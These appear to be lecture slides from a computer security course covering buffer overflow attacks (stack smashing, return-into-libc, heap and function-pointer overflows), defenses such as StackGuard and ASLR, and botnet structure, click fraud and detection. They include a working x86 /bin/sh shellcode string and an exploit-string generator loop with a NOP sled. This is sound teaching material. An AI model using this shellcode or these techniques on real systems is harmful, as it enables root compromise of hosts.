Transcript C&C
The Attack and Defense of Computers
Dr. 許
富 皓
1
Attacking Program Bugs
2
Attack Types
Buffer Overflow Attacks:
Stack Smashing attacks
Return-into-libc attacks
Heap overflow attacks
Function pointer attacks
.dtors overflow attacks.
setjump/longjump buffer overflow attacks.
Format string attacks:
Integer overflow and integer sign attacks
3
Why Buffer Overflow Attacks
Are So Dangerous?
Easy to launch:
Attackers can launch a buffer overflow attack by just
sending a craft string to their targets to complete such
kind of attacks.
Plenty of targets:
Plenty of programs have this kind of vulnerabilities.
Cause great damage:
Usually the end result of a buffer overflow attack is the
attacker’s gaining the root privilege of the attacked host.
Internet worms proliferate through buffer
overflow attacks.
4
Stack Smashing Attacks
5
Principle of Stack Smashing
Attacks
Overwritten control transfer structures, such
as return addresses or function pointers, to
redirect program execution flow to desired
code.
Attack strings carry both code and
address(es) of the code entry point.
6
Explanation of BOAs (1)
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i;
G’s stack frame
b
return address add_g
address of G’s
frame point
while((c[i++]=getch())!=EOF)
{
}
Input String: xyz
}
H’s stack
frame
C[99]
0xabc
0xabb
0xaba
Z
Y
X
C[0]
7
Explanation of BOAs (2)
Length=108 bytes
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i;
Attack String: xxInjected Codexy0xabc
b
return address add_g
addrress oxabc
address of G’s
frame point
while((c[i++]=getch())!=EOF)
{
}
}
y
x
0xabc
0xabb
0xaba
H’s stack
frame
C[99]
Injected Code
x
x
C[0]
8
Injected Code:
The attacked programs usually have root privilege;
therefore, the injected code is executed with root
privilege.
The injected code is already in machine instruction
form; therefore, a CPU can directly execute it.
However the above fact also means that the injected code
must match the CPU type of the attacked host.
Usually the injected code will fork a shell; hence,
after an attack, an attacker could have a root shell.
9
Injected Code of Remote BOAs
In order to be able to interact with the newly
forked root shell, the injected code usually
need to execute the following two steps:
Open a socket.
Redirect standard input and output of the newly
forked root shell to the socket.
10
Example of Injected Code for
X86 Architecture : Shell Code
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46
\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\
x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
11
Two Factors for A Successful
Buffer Overflow-style Attack(1)
A successful buffer overflow-style attack
should be able to overflow the right place
(e.g. the place to hold a return address with
the correct value (e.g. the address of
injected code entry point)).
12
Two Factors for A Successful
Buffer Overflow-style Attack(2)
return address
buffer where the
overflow start
injected code
address of injected code
entry point.
offset between the beginning of the
overflowed buffer and the overflow
target.
The offset and the entry point address are non-predicable. They can
not decided by just looking the source code or local binary code.
13
Non-predicable Offset
For performance concerns, most compilers don’t
allocate memory for local variables in the order
they appear in the source code, sometimes some
space may be inserted between them. (Source
Code doesn’t help)
Different compiler/OS uses different allocation
strategy. (Local binaries don’t help)
Address obfuscation insert random number of
space between local variables and return address.
(Super good luck may help)
14
Non-predicable Entry Point
Address
[fhsu@ecsl]#
0xbfffffff
webserver –a –b security
system data
environment variables
argument strings
env pointers
argv pointers
argc
command line arguments
and environment variables
Function main()’s
stack frame
15
Strategies Used by Attackers to
Increase Their Success Chance
Repeat address patterns.
Insert NOP (0x90) operations before the
entry point of injected code.
16
Exploit Code Web Sites
Exploit World
MILWORM
Metasploit
Securiteam
17
An Exploit Code Generation
Program
This program uses the following three loop to
generate the attack string which contains the
shell code.
for(i=0;i<sizeof(buff);i+=4)
*(ptr++)=jump;
for(i=0;i<sizeof(buff)-200-strlen(evil);i++)
buff[i]=0x90;
for(j=0;j<strlen(evil);j++)
buff[i++]=evil[j];
18
Return-into-libc Attacks
19
Return-into-libc
A mutation of buffer overflow attacks.
Utilize code already resided in the attacked
programs’ address space, such as libc
functions.
Attack strings carry entry point address(es)
of a desired libc function, new frame
point address and parameters to the
function.
20
How Parameters and Local Variables
Are Represented in an Object File?
abc(int aa)
{ int bb;
bb==aa;
:
:
}
abc:
function prologue
*(%ebp-4)=*(%ebp+8)
function epilogue
aa
return address
previous frame
point
ebp
bb
21
A Way to Change the Parameters and
Local Variables of a Function.
A parameter or a local variable in an object file is
represented through its offset between the position
pointed by %ebp and its own position.
Therefore, the value of the %ebp register decides
where a function to get its parameters and local
variables.
In other words, if an attacker can change the %ebp
of a function, then she/he can also change the
function’s parameters and local variables.
22
Function Prologue and Epilogue
3
function prologue
#include <stdio.h>
add_three_items:
pushl
%ebp
movl
%esp, %ebp
subl
$4, %esp
movl
addl
addl
movl
movl
int add_three_items(int a, int b, int c)
{ int d;
d=a+b+c;
return d;
}
12(%ebp), %eax
8(%ebp), %eax
16(%ebp), %eax
%eax, -4(%ebp)
-4(%ebp), %eax
4
function epilogue
leave
ret
leave=movl %ebp,%esp
popl %ebp
23
Function Calls
main:
main()
{ int a, b,c,f;
extern int add_three_items();
a=1;
b=2;
c=3;
f=add_three_items(a,b,c);
}
1
2
5
leave=movl %ebp,%esp
popl %ebp
pushl
movl
subl
%ebp
%esp, %ebp
$24, %esp
andl
movl
subl
movl
movl
movl
$-16, %esp
$0, %eax
%eax, %esp
$1, -4(%ebp)
$2, -8(%ebp)
$3, -12(%ebp)
subl
pushl
pushl
pushl
call
addl
$4, %esp
-12(%ebp)
-8(%ebp)
-4(%ebp)
add_three_items
$16, %esp
movl
%eax, -16(%ebp)
leave
ret
24
Example code
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}
main(int argc, char *argv[]) {
function(1,2,3);
}
gcc -S test.c;
function:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
leave
ret
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
pushl $3
pushl $2
pushl $1
call function
addl $12, %esp
leave
ret
25
high
bp
leave =
movl %ebp, %esp
popl %ebp
low
ret addr (EIP)
%ebp
…
$3
$2
$1
ret addr (EIP)
%ebp
…
heap
bss
sp
function:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
leave
ret
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
pushl $3
pushl $2
pushl $1
call function
addl $12, %esp
leave
ret
26
Explanation of Return-into-libc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[10];
parameter 1, e.g. pointer to /bin/sh
b
any value
return address add_g
abc(), e.g. system()
overflow occurs
here
}
address of G’s frame point
any value
C[9]
esp
H’s stack frame
ebp
C[0]
abc: pushl %ebp
movl %esp,%ebp
27
Explanation of Return-into-libc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[10];
overflow occurs
here
}
parameter 1, e.g. pointer to /bin/sh
b
any value
return address add_g
abc(), e.g. system()
esp
movl %ebp,%esp
(an instruction in
function epilogue)
address of G’s frame point
any value
C[9]
H’s stack frame
ebp
C[0]
abc: pushl %ebp
movl %esp,%ebp
28
Explanation of Return-into-libc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[10];
overflow occurs
esp
here
(popl %ebp)
}
parameter 1, e.g. pointer to /bin/sh
b
any value
return address add_g
abc(), e.g. system()
address of G’s frame point
any value
C[9]
H’s stack frame
any value
ebp
C[0]
abc: pushl %ebp
movl %esp,%ebp
29
Explanation of Return-into-libc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[10];
parameter 1, e.g. pointer to /bin/sh
esp
overflow occurs
here
}
(ret)
b
any value
return address add_g
abc(), e.g. system()
address of G’s frame point
any value
C[9]
H’s stack frame
any value
ebp
C[0]
abc: pushl %ebp
movl %esp,%ebp
30
Explanation of Return-into-libc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[10];
overflow occurs
here
}
parameter 1, e.g. pointer to /bin/sh
esp
b
any value
return address add_g
any value
address of G’s frame point
any value
C[9]
After the following
two instruction in
function system()’s
function prologue is
executed
pushl %ebp
movl %esp, %ebp,
the position of %esp
and %ebp is shown
in the figure.
ebp
H’s stack frame
C[0]
abc: pushl %ebp
movl %esp,%ebp
31
Properties of Return-into-libc Attacks
The exploit strings don’t need to contain
executable code.
32
Heap/Data/BSS Overflow Attacks
33
Principle of Heap/Data/BSS
Overflow Attacks
Similarly to stack smashing attacks, attackers
overflow a sensitive data structure by providing a
buffer which is adjacent to the sensitive data
structure more data than the buffer can store;
hence, to overflow the sensitive data structure.
The sensitive data structure may contain:
• A function pointer
• A pointer to a string
• … and so on.
Both the buffer and the sensitive data structure
may locate at the heap, or data, or bss section.
34
Heap and Data/BSS Sections
The heap is an area in memory that is dynamically
allocated by the application by using a system call,
such as malloc() .
On most systems, the heap grows up (towards higher
addresses).
The data section initialized at compile-time.
The bss section contains uninitialized data, and is
allocated at run-time.
Until it is written to, it remains zeroed (or at least from
the application's point-of-view).
35
Heap Overflow Example
#define BUFSIZE 16
int main()
{ int i=0;
char *buf1 = (char *)malloc(BUFSIZE);
char *buf2 = (char *)malloc(BUFSIZE);
:
while((*(buf1+i)=getchar())!=EOF)
i++;
:
}
36
BSS Overflow Example
#define BUFSIZE 16
int main(int argc, char **argv)
{ FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
:
tmpfile = "/tmp/vulprog.tmp";
gets(buf);
tmpfd = fopen(tmpfile, "w");
:
}
37
BSS and Function Pointer Overflow
Example
int goodfunc(const char *str);
int main(int argc, char **argv)
{ int i=0;
static char buf[BUFSIZE];
static int (*funcptr)(const char *str);
:
while((*(buf+i)=getchar())!=EOF)
i++;
:
}
38
Function Pointer Attacks
39
Principle of Function Pointer Attacks
Utilizing a function pointer variable’s
adjacent buffer to overwrite the content of
the function pointer variable so that it will
point to the code chosen by attackers.
A function pointer variable may locate at
the stack section, the data section, or at the
bss section.
40
Countermeasures of
Buffer Overflow Attacks
41
Countermeasures of Buffer
Overflow Attacks (1)
Array bounds checking.
Non-executable stack/heap.
Safe C library.
Compiler solutions, e.g.,
StackGuard
RAD
Type safe language, e.g. Java.
Static source code analysis.
42
Countermeasures of Buffer
Overflow Attacks (2)
Anomaly Detection, e.g. through system
calls.
Dynamic allocation of memory for data that
will overwrite adjacent memory area.
Memory Address Obfuscation/ASLR
Randomization of executable Code.
Network-based buffer overflow detection
43
Array Bounds Checking
Fundamental solution for all kinds of buffer
overflow attacks.
High run-time overhead (1 time in some
situations)
44
Non-executable Stack/Heap
The majority of buffer overflow attacks are
stack smashing attacks; therefore, a nonexecutable stack could block the majority of
buffer overflow attacks.
Disable some original system functions, e.g.
signal call handling, nested functions.
45
Safe C Library
Some string-related C library functions, such as
strcpy and strcat don’t check the buffer
boundaries of destination buffers, hence,
modifying these kinds of unsafe library functions
could secure programs that use these function.
Replace strcpy with strncpy, or replace
strcat with strncat, … and so on.
Plenty of other C statements could still results in
buffer overflow vulnerabilities.
E.g. while ((*(ptr+i)=getchar())!=EOF)
i++;
46
Compiler Solutions: StackGuard
Put a canary word before each return address in
each stack frame. Usually, when a buffer overflow
attack is launched, not only the return address but
also the canary word will be overwritten; thus, by
checking the integrity of the canary word, this
mechanism can defend against stack smashing
attacks.
Low performance overhead.
Change the layout of the stack frame of a function;
hence, this mechanism is not compatible with
some programs, e.g. debugger.
Only protect return addresses.
47
Compiler Solutions: RAD
Store another copies of return addresses in a wellprotected area, RAR.
When a function is call, instead of saving its return
address in its corresponding stack frame, another
copy of its return address is saved in RAR. When
the function finishes, before returning to its caller,
the callee checks the return address in its stack
frame to see whether the RAR has a copy of that
address. If there is no such address in the RAR,
then a buffer overflow attack is alarmed.
Low performance overhead.
Only protect return addresses.
48
Type Safe Language, e.g. Java
These kinds of languages will automatically
perform array bound checking.
The majority of programs are not written in
these kinds of languages; rewriting all
programs with these kinds of languages
becomes an impossible mission.
49
Static Source Code Analysis.
Analyze source code to find potential
program statements that could result in
buffer overflow vulnerabilities. E.g.
program statements like
while((*(buf+i)=getchar())!=EOF)
i++;
are not safe.
False positive and false negative.
Difficulty to obtain the source code.
50
Anomaly Detection
This mechanism is based on the idea that
most malicious code that is run on a target
system will make system calls to access
certain system resources, such as files and
sockets.
This technique has two main parts:
Preprocessing
monitoring.
False positive and false negative.
51
Memory Address Obfuscation/ASLR
This approach randomizes the layout of
items in main memory; hence attackers can
only guess the address where their injected
code reside and the address of their target
functions.
Change the run-time memory layout
specifying by the original file format.
Increase the complexity of debugging a
program.
52
Aspects of Address Obfuscation (1)
The first is the randomization of the base
addresses of memory regions.
This involves the randomization of the base address of
•
•
•
•
the stack
heap
the starting address of dynamically linked libraries
the locations of functions and static data structures contained in
the executable.
The second aspect includes permuting the order of
variables and functions.
53
Aspects of Address Obfuscation(2)
The last is the introduction of random
length gaps, such as
padding in stack frames
padding between malloc allocations
padding between variables and static data
structures
random length gaps in the code segment, with
jumps to get over them.
54
Randomization of executable Code
This method involves the randomization of the code that is
executed in a process.
This approach encrypts instructions of a process, and
decrypts instructions when they are prepared to be
executed. Because attackers don’t know the key to encrypt
their code, their injected code can not be decrypted
correctly. As a result their code can not be executed.
The main assumption of this method is that most attacks
that attempt to gain control of a system are code-injection
attacks.
Need special hardwares to improve performance overhead.
55
Botnet [Trend Micro]
56
Definition of a Botnet
A botnet (zombie army or drone army)
refers to a pool of compromised computers
that are under the command of a single
hacker, or a small group of hackers, known
as a botmaster.
57
Definition of a Bot
A bot refers to a compromised end-host, or
a computer, which is a member of a botnet.
58
The First Bot Generation Malware PrettyPark
The first bot generation malware, PrettyPark
worm, appeared in 1999.
A critical difference between PrettyPark and
previous worms is that it makes use of IRC as a
means to allow a botmaster to remotely control a
large pool of compromised hosts.
Its revolutionary idea of using IRC as a discrete
and extensible method for Command and Control
(C&C) was soon adopted by the black hat
community.
59
How Fast Could Your Computer Be
Comprised?
Based on the observation of an unpatched version of
Windows 2000 or Windows XP located within a dial-in
network of a German ISP.
Normally it takes only a couple of minutes before it is successfully
compromised.
On average, the expected lifespan of the honeypot is less than ten
minutes.
• After this small amount of time, the honeypot is often successfully
exploited by automated malware.
The shortest compromise time was only a few seconds:
• Once we plugged the network cable in, an SDBot compromised the
machine via an exploit against TCP port 135 and installed itself on
the machine.
60
Typical Size of Botnets
Some botnets consist of only a few hundred
bots.
In contrast to this, several large botnets with
up to 50.000 hosts were also oberved.
Botnets with over several hundred
thousands hosts have been reported in the
past.
61
A Hosts May be Infected by Several
Botnets Simultaneously
A home computer which got infected by 16
different bots has been found.
62
Taxonomy of Botnets
Attacking behavior
C&C models
Rally mechanisms
Communication protocols
Observable botnet activities
Evasion Techniques
63
Attacking Behavior [Paul Bächer et al.]
Distributed Denial-of-Service Attacks
Spamming
Sniffing Traffic
Keylogging
Spreading new malware
Installing Advertisement Addons
Google AdSense abuse
Manipulating online polls/games
Mass identity theft
64
Distributed Denial-of-Service
Attacks (1)
Often botnets are used for Distributed Denial-ofService (DDoS) attacks.
A DDoS attack is an attack on a computer system
or network that causes
a loss of service to users, typically the loss of network
connectivity and services
by
consuming the bandwidth of the victim network
or
overloading the computational resources of the victim
system.
65
Distributed Denial-of-Service
Attacks (2)
Further research showed that botnets are even
used to run commercial DDoS attacks against
competing corporations:
Operation Cyberslam documents the story of Jay R.
Echouafni and Joshua Schichtel alias EMP.
Echouafni was indicted on August 25, 2004 on
multiple charges of conspiracy and causing damage to
protected computers. He worked closely together with
EMP who ran a botnet to send bulk mail and also
carried out DDoS attacks against the spam blacklist
servers.
In addition, they took Speedera - a global on-demand
computing platform - offline when they ran a paid
DDoS attack to take a competitor's website down.
66
Spamming
Some bots offer the possibility to open a SOCKS v4/v5
proxy - a generic proxy protocol for TCP/IP-based
networking applications (RFC 1928) - on a compromised
machine.
Some bots also implement a special function to harvest
email-addresses.
After having enabled the SOCKS proxy, this machine can
then be used for nefarious tasks such as spamming.
With the help of a botnet and thousands of bots, an attacker is able
to send massive amounts of bulk email (spam).
Often that spam you are receiving was sent from, or proxied
through, an old Windows computer at home.
In addition, this can of course also be used to send phishing-mails
since phishing is a special case of spam.
67
Sniffing Traffic
Bots can also use a packet sniffer to watch for
interesting clear-text data passing by a
compromised machine.
The sniffers are mostly used to retrieve sensitive
information like usernames and passwords.
If a machine is compromised more than once and
also a member of more than one botnet, the packet
sniffing allows to gather the key information of
the other botnet. Thus it is possible to "steal"
another botnet.
68
Keylogging
If the compromised machine uses encrypted
communication channels (e.g. HTTPS or POP3S), then
just sniffing the network packets on the victim's computer
is useless since the appropriate key to decrypt the packets
is missing.
With the help of a keylogger it is very easy for an attacker
to retrieve sensitive information.
An implemented filtering mechanism (e.g. "I am only interested in
key sequences near the keyword 'paypal.com'") further helps in
stealing secret data.
And if you imagine that this keylogger runs on thousands of
compromised machines in parallel you can imagine how quickly
PayPal accounts are harvested.
69
Spreading New Malware
In most cases, botnets are used to spread
new bots. This is very easy since all bots
implement mechanisms to download and
execute a file via HTTP or FTP.
Spreading an email virus using a botnet is a
very nice idea, too.
A botnet with 10,000 hosts which acts as the
start base for the mail virus allows very fast
spreading and thus causes more harm.
70
Installing Advertisement Addons
Botnets can also be used to gain financial advantages.
This works by setting up a fake website with some
advertisements:
The operator of this website negotiates a deal with some hosting
companies that pay for clicks on ads.
With the help of a botnet, these clicks can be "automated" so that
instantly a few thousand bots click on the pop-ups.
This process can be further enhanced if the bot hijacks the
start-page of a compromised machine so that the "clicks"
are executed each time the victim uses the browser.
71
Google AdSense Abuse
A similar abuse is also possible with Google's AdSense
program:
AdSense offers companies the possibility to display Google
advertisements on their own website and earn money this way.
The company earns money due to clicks on these ads, for example
per 10,000 clicks in one month.
An attacker can abuse this program by leveraging his botnet to
click on these advertisements in an automated fashion and thus
artificially increments the click counter.
This kind of usage for botnets is relatively uncommon, but not a
bad idea from an attacker's perspective.
72
Loss Caused by Click Fraud [Catherine
Holahan]
On average, consultants estimate that
between 14% and 15% of clicks are
fraudulent.
73
Google Search Page
74
Google Search Result Page
75
Source HTML File of the Google
Search Result Page
76
Ampersands (&'s) in URLs [Liam Quinn ]
Always use & in place of & when
writing URLs in HTML:
E.g.:
<a
href="foo.cgi?chapter=1&section=2&copy=
3&lang=en">...</a>
77
Click Fraud (1) - Use the Browser’s
URL Field
78
Click Fraud (2) – Connect to the
Google Server Directly
Attackers could launch the same attacks by
opening a HTTP connection to a Google server
and
sending the URL in the previous slide to the
above server directly.
79
Click Fraud (3) - Use Fake Page (1)
80
Click Fraud (3) - Use Fake Page (2) [Mr. 東]
81
Click Fraud (3) - Use Fake Page (3)
82
Manipulating online Polls/Games
Since every bot has a distinct IP address,
every vote will have the same credibility as
a vote cast by a real person.
Online games can be manipulated in a
similar way. Currently we are aware of bots
being used that way, and there is a chance
that this will get more important in the
future.
83
Mass Identity Theft
Often the combination of different functionality described above can
be used for large scale identity theft, one of the fastest growing crimes
on the Internet.
Bogus emails ("phishing mails") that pretend to be legitimate (such as
fake PayPal or banking emails) ask their intended victims to go
online and submit their private information.
These fake emails are generated and sent by bots via their spamming
mechanism.
These same bots can also host multiple fake websites pretending to be
ebay, PayPal, or a bank, and harvest personal information.
Just as quickly as one of these fake sites is shut down, another one can
pop up.
In addition, keylogging and sniffing of traffic can also be used for
identity theft.
84
What Is IRC, and How Does It Work? [David
Caraballo et al.]
IRC (Internet Relay Chat) provides a way of
communicating in real time with people from all over the
world.
It consists of various separate networks (or "nets") of IRC
servers, machines that allow users to connect to IRC.
The largest nets are
EFnet (the original IRC net, often having more than 32,000 people
at once),
Undernet,
IRCnet,
DALnet,
and NewNet.
85
IRC Client
Generally, the user (such as you) runs a program
(called a "client") to connect to a server on one of
the IRC nets.
The server relays information to and from other
servers on the same net.
Recommended clients:
UNIX/shell: ircII
Windows: mIRC
Macintosh clients
86
IRC Bot [wikepedia]
An IRC bot is a set of scripts or an
independent program that connects to
Internet Relay Chat as a client, and so
appears to other IRC users as another user.
It differs from a regular client in that instead
of providing interactive access to IRC for a
human user, it performs automated
functions.
87
IRC Channels
Once connected to an IRC server on an IRC network, you
will usually join one or more "channels" and converse
with others there.
On IRC, channels are where people meet and chat.
You may know them as "chat rooms".
Channel names usually begin with a #, as in #irchelp.
Conversations may be
public (where everyone in a channel can see what you type)
or
private (messages between only two people, who may or may not
be on the same channel).
88
Scheme of an IRC-Network [wikipedia]
normal clients (green)
bots (blue)
bouncers (orange)
89
Command and Control (C&C) System
C&C works as follows.
A botmaster sets up a C&C server, typically an
IRC server.
After a bot virus infects a host, it will connect
back to the C&C server and wait on the
botmaster’s command.
In a typical IRC botnet, the bot will join a
certain IRC channel to listen to messages from
its master.
90
Categories of C&C
C&C systems can be roughly categorized into
three different models
the centralized model,
the peer-to-peer (P2P) model
the random model
P.S.: We believe these three C&C models are
sufficient to cover all the botnets found today. But
there is possibility that future botnets may use new
command and control systems that are completely
from any of them, noting the quickly evolving
nature of botnets.
91
Centralized C&C Model
In the centralized model, a botmaster selects a single high
bandwidth host to be the contacting point (C&C server) of
all the bots.
The C&C server, usually a compromised computer as well, would
run certain network services such as IRC, HTTP and etc.
When a new computer is infected by a bot, it will join the botnet
by initiating a connection to the C&C server.
Once joined to the appropriate C&C server channel, the bot would
then wait on the C&C server for commands from the botmaster.
Botnets may have mechanisms to protect their communications.
• For example, IRC channels may be protected by passwords only
known to bots and their masters to prevent eavesdropping.
92
Popularity of the Centralized C&C
Model
The centralized model is the predominant
C&C model used by existing botnets.
Many well known bots, such as AgoBot,
SDBot and RBot, fall into the category of
the centralized C&C model.
93
Why the Centralized C&C Model (1) ?
Due to the rich variety of software tools (e.g., IRC
bot scripts on IRC servers and IRC bots), the
centralized C&C model is rather simple to
implement and customize.
Notice that a botmaster can easily control
thousands of bots using the centralized model.
Botmasters are profit driven; hence, they are more
interested in the centralized C&C model which
allows them to control as many bots as possible
and maximize their profit.
94
Why the Centralized C&C Model (2) ?
Few countermeasures have been used to
fight against botnets. So, the centralized
botnets have good survivability in the real
world at this moment.
95
Why the Centralized C&C Model (3) ?
Messaging latencies in the centralized
model is small. Therefore, it is easy for
botmasters to coordinate botnets and launch
attacks.
96
Drawback of the Centralized C&C
Model
The C&C server is the crucial place where
most of the conversation happens. Therefore,
the C&C server is the weakest link in a
botnet.
If we can manage to discover and destroy
the C&C server, the entire botnet will be
gone.
97
Motivation for a P2P-Based C&C
Model
Some botnet authors have started to build
alternative botnet communication systems, which
are more resilient to failures in the network.
An interesting C&C paradigm that emerged
recently exploits the idea of P2P communication.
For instance, certain variants of Phatbot have used
P2P communication as a means to control botnets.
The botnets that use P2P based C&C are still very
few.
98
Futures of the P2P-Based C&C
Model
Compared with the centralized C&C model, the
P2P based C&C model is much harder to
discover and destroy. Since the communication
system doesn’t heavily depend on a few selected
servers, destroying a single, or even a number of
bots, won’t necessarily lead to the destruction of
an entire botnet.
Because of this, it is possible that the P2P based
C&C model will be used increasingly in botnets
in the near future.
99
Constraints of the P2P C&C Model (1)
Existing P2P systems only support
conversations of small user groups, usually
in the range of 10-50 users.
The group size supported by P2P systems is
too small compared to the size of
centralized C&C botnets, in which a botnet
of 1000 compromised hosts is still on the
small side.
100
Constraints of the P2P C&C Model (2)
Existing P2P systems don’t guarantee
message delivery and propagation latency.
Therefore, if using P2P communication, a
botnet would be harder to coordinate than
those which use centralized C&C models.
101
Trend of the P2P C&C Model
The above two constraints have limited the wider
adoption of P2P based communication in botnets.
As the knowledge on implementing P2P based
botnets accumulates, new P2P-based botnets,
which overcome the above limitations, may appear.
As such, more and more botnets will move to use
P2P based communication since it is more robust
than centralized C&C communication.
102
Random C&C Model
In the proposed random C&C model, a bot will not actively contact
other bots or the botmaster.
Rather, a bot would listen to incoming connections from its botmaster.
To launch attacks, a botmaster would scan the Internet to discover its
bots.
When a bot is found, the botmaster will issue command to the bot.
While such a C&C model is easy to implement and highly resilient to
discovery and destruction, the model intrinsically has scalability
problem, and is difficult to be used for large scale, coordinated attacks.
Although this C&C model has not been used in real world botnets, it is
potentially interesting to certain future types of botnets that want high
survivability.
103
Rallying Mechanisms
Rallying mechanisms are critical for botnets
to discover new bots and rally them under
their botmasters.
104
Hard-coded IP Address
A common method used to rally new bots works like this:
A bot includes hard-coded C&C server IP addresses in its binary.
When the bot initially infects a computer, it will connect back to
the C&C server using the hard-coded server IP address that is
contained in the binary code.
The problem with using hard-coded IP addresses is that the C&C
server can be easily detected and the communication channel
easily blocked.
If a C&C server is "disconnected" in this fashion, a botnet may be
completely deactivated. Because of this, hard-coded server IP
addresses are not as much used now by recent variants of bots.
105
Dynamic DNS Domain Name
The bots today often include hard-coded domain names, assigned by
dynamical DNS providers.
The benefit to use dynamic DNS is that, if a C&C server is shutdown
by authorities, the botmaster can easily resume his/her control by
creating a new C&C server somewhere else and updating the IP
address in the corresponding dynamic DNS entry.
When connections to the old C&C server fail, the bots will perform DNS
queries and be redirected to the new C&C server.
This DNS redirection behavior is often known as herding.
Using dynamic DNS names, a botmaster can retain the control on its
botnet when existing C&C server fails to function. Sometimes, a
botmaster will also update the dynamic DNS entry periodically to shift
the locations of the command and control server, making the detection
harder.
106
Distributed DNS Service
Some of the newer botnet breeds run their own distributed
DNS service at locations that are out of the reach of law
enforcement or other authorities.
Bots include the addresses of these DNS servers and
contact these servers to resolve the IP addresses of C&C
servers.
Many times, these DNS services are chosen to run at high
port numbers in order to evade the detection by security
devices at gateways.
The botnets using distributed DNS service to rally their
bots are the hardest to detect and destroy, compared with
other types of botnets discussed.
107
Communication Protocols
Bots communicate with each other and their
botmasters following certain well-defined network
protocols.
In most cases, botnets don’t create new network
protocols for their communication. Instead, they
use existing communication protocols that are
implemented by publicly available software tools.
e.g., the IRC protocol itself, and already publicly
available software implementations for IRC servers
and clients.
108
The Importance of Understanding
the Botnet Communication Protocols
First, their communication characteristics provide
an understanding of
the botnets’ origins
and
the possible software tools being used.
Secondly, understanding the communication
protocols help security researchers to decode the
conversations which happen among bots and their
masters.
109
Common Botnet Communication
Protocols
IRC Protocol
HTTP Protocol
P2P Protocol
… and so on.
110
Evasion Techniques – for AV and
IDS
A variety of techniques are used by botnets to
evade AV and signature based IDS systems, e.g.,
sophisticated executable packers
rootkits
protocol evasion techniques, etc
These evasion techniques improve the
survivability of botnets and the success rate of
compromising new hosts.
111
Evasion Techniques –
Communication (1)
Additionally, botnets have also added (and continue to add)
new mechanisms to hide traces of their communication.
Some botnets are moving away from IRC, since
monitoring of IRC traffic is increasingly done in an effort
to detecting botnets.
Instead, botnets are starting to use
modified IRC protocols
or
other protocols altogether (e.g., HTTP, VoIP)
for their communication channels.
112
Evasion Techniques –
Communication (2)
Encryption schemes are also being used to prevent
the content from being revealed.
Certain state-of-the-art botnets even use convert
channel communications such as TCP and ICMP
tunneling, and even IPv6 tunneling.
There have been technical discussions which
discuss the possibility of using SKYPE and IM to
support communication.
113
Other Observable Activities
In order to detect the presence of botnets,
we need to discover abnormal behaviors
exhibited by botnets.
The botnet observable behaviors can be
categorized into three types:
network based behavior
host-based behavior
global correlated behavior.
114
Network-based Behaviors
1. Observable Communication
Botmasters need to communicate with their
bots and launch attacks.
2. Observable Attacking Traffic
When performing these functions, botnets
will generate certain observable network
traffic patterns that we can use to detect
individual bots and their C&C servers.
115
Observable Communication (1)
Since botnets often use IRC and HTTP to
communicate with their bots, observable IRC &
HTTP traffic with abnormal patterns can be used
to indicate the presence of bots and the C&C
servers.
For example,
• inbound/outbound IRC traffic to an interior enterprise network
where IRC service is not allowed
and
• IRC conversations that follow certain syntax conventions that
humans don’t readily understand.
116
Observable Communication (2)
Many botnets use dynamic DNS domain names to locate
their C&C servers. Thus, abnormal DNS queries may also
used to detect botnets.
In some instances, hosts are found to query for improper
domain names (e.g., cheese.dns4biz.org,
butter.dns4biz.org) which can indicate a high
probability that these hosts are compromised.
The next logical step in this methodology would be to attempt to
glean the IP addresses of their C&C servers in observable traffic
streams.
If further detective work reveals that the IP address associated to a
particular domain name keeps changing periodically, it can provide
an even stronger indication the presence of a botnet.
117
Observable Communication (3)
Moreover, botnets may exhibit additional network
abnormalities that allow us to discover them.
One example would be a case in which bots are usually
idle most of the time in a connection, and would
response faster than a human being at the keyboard
surfing the web.
Yet another example would be a case of some sort of
communication traffic originated by botnets is more
"bursty" than normal traffic.
So, botnets can potentially be discovered by
monitoring network traffic flow.
118
Observable Attacking Traffic
The traffic generated by botnets allows us to
discover their presence.
For example,
• When launching DDoS TCP SYN flood attacks, botnets can
send out a large number of invalid TCP SYN packets with
fake source IP addresses. Therefore, if a network monitoring
device finds a large number of outbound TCP SYN packets
that have invalid source IP address (i.e., IP addresses that
should not come from the internal network), it would indicate
that some internal hosts may be compromised, and actively
participating in a DDoS attack.
• Similarly, if an internal host is found to send out phishing emails, there is an indication that the host is infected by bots as
well.
119
Host Based Behavior
Bots compromise computers and hide their
presence just like many older computer viruses.
Therefore, they exhibit certain observable
behaviors as viruses do at compromised hosts.
When executing, bots will make sequences of
system/library calls, e.g.
• modifying system registries and system files
• creating network connections
• disabling antivirus programs
The sequences of system/library calls made by bots are
often different from legitimate programs and
applications.
120
Global Correlated Behaviors
Perhaps botnet behavior observed in a global
snapshot is the most interesting one from the
viewpoint of detection efficiency.
Those global behavioral characteristics are often
tied to the fundamental structures and mechanisms
of botnets. Consequently, they are unlikely to
change from botnet to botnet unless the structures
and mechanisms of botnets themselves are
redesigned and re-implemented.
As a result, these globally observable behaviors
are the most valuable to detect families of botnets.
121
Global Correlated Behaviors – DNS
Traffic (1)
Many botnets use dynamic DNS entry to track their C&C servers.
As a new C&C server is built, the related DNS entry will be updated
to the IP address of the new C&C server. Therefore, bots will find the
location of the new C&C server.
Botmasters may herd their botnets to different C&C servers’ locations
periodically to prevent detections.
